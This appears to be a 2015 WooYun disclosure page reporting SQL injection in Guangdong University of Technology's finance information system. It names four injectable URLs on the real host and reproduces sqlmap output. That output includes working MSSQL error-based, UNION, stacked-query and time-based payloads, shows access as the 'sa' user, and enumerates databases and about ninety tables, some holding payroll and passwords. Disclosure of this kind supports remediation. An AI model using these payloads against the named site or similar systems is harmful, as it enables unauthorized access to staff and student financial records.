当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091360

漏洞标题:广东工业大学财务信息查询系统SQL注入(附带四处)

相关厂商:广东工业大学

漏洞作者: YuShen

提交时间:2015-01-14 12:50

修复时间:2015-01-19 12:52

公开时间:2015-01-19 12:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-14: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入

详细说明:

SQL注入!

漏洞证明:

注入点:
http://cwc.gdut.edu.cn/cwwj/cwwj.asp?lx=%C4%BC
http://cwc.gdut.edu.cn/fwzn/fwzn.asp?lx=%D6%B0
http://cwc.gdut.edu.cn/gzzd/showinfo.asp?ID=41
http://cwc.gdut.edu.cn/gg/showinfo.asp?id=605
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: lx
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lx=%C4%BC' AND 2584=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(12
1)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2584=2584) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(113))) AND 'iBct'='iBct
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: lx=%C4%BC' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(121)
+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(84)+CHAR(89)+CHAR(71)+CHAR(74)+CHAR(103)+CHAR
(88)+CHAR(88)+CHAR(71)+CHAR(103)+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(11
3),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lx=%C4%BC'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lx=%C4%BC' AND 3203=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys
users AS sys7) AND 'Orwo'='Orwo
---
[13:54:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2005
[13:54:19] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\cwc.gdut.edu.cn'
[*] shutting down at 13:54:19
current user: 'sa'
current database: 'oa88'
available databases [6]:
[*] master
[*] model
[*] msdb
[*] oa88
[*] tempdb
[*] ykt
Database: oa88
[92 tables]
+---------------------+
| CJKC |
| CRZ_nw |
| D99_Tmp |
| GGXSMS_DK |
| GGXSMS_Dep |
| GGXSMS_jdj |
| Gdbf22 |
| Gdbf22 |
| JJ0209 |
| NHKK0815 |
| PAYMX08 |
| bgxx |
| bgxz |
| bk_dkxf |
| bk_jbzl |
| bk_jxj |
| bk_qtjj |
| bk_sfhz |
| bk_yhdk |
| bk_ylhz |
| bmjcj |
| cdbf1 |
| cj0908 |
| cjls |
| crzjxj |
| ctgz0706 |
| cttx0706 |
| cttx0706 |
| ctzz |
| cwdt |
| cwwj |
| cwyenf |
| cwyenf |
| cwzk_old |
| cwzk_old |
| dep_kemu |
| dep_kemu |
| dtproperties |
| fwzn |
| gdbf1 |
| gg |
| ggxsms_sfhz_cj |
| ggxsms_zy |
| gjj |
| grbt2 |
| grbt2 |
| grbt2 |
| grbt3 |
| gz_jtbtmx |
| gz_qtbtmx |
| gzzd |
| jtbt |
| kemu_mc |
| kydk |
| nhzh |
| pangolin_test_table |
| pay_hz |
| pay_mx_info |
| payhz07 |
| payhz08 |
| payhz09 |
| payhz10 |
| payhz11 |
| payhz12 |
| payhz13 |
| payhz14 |
| payhz_all11 |
| payhz_all12 |
| payhz_all13 |
| payhz_all14 |
| qtbt |
| xm |
| xmzd201305 |
| xmzd201305 |
| xmzd20140321 |
| yhqx |
| yjj20140227 |
| yjjpwd20140227 |
| zwbmzd |
| zwfzje |
| zwkmje |
| zwpzb |
| zwpzfl2008 |
| zwpzfl2008 |
| zwpzfl2009 |
| zwpzfl2010 |
| zwpzfl2011 |
| zwpzfl2012 |
| zwpzfl2013 |
| zwxmje |
| zwxmzd |
| zwzfdz |
+---------------------+

修复方案:

过滤!

版权声明:转载请注明来源 YuShen@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-19 12:52

厂商回复:

最新状态:

暂无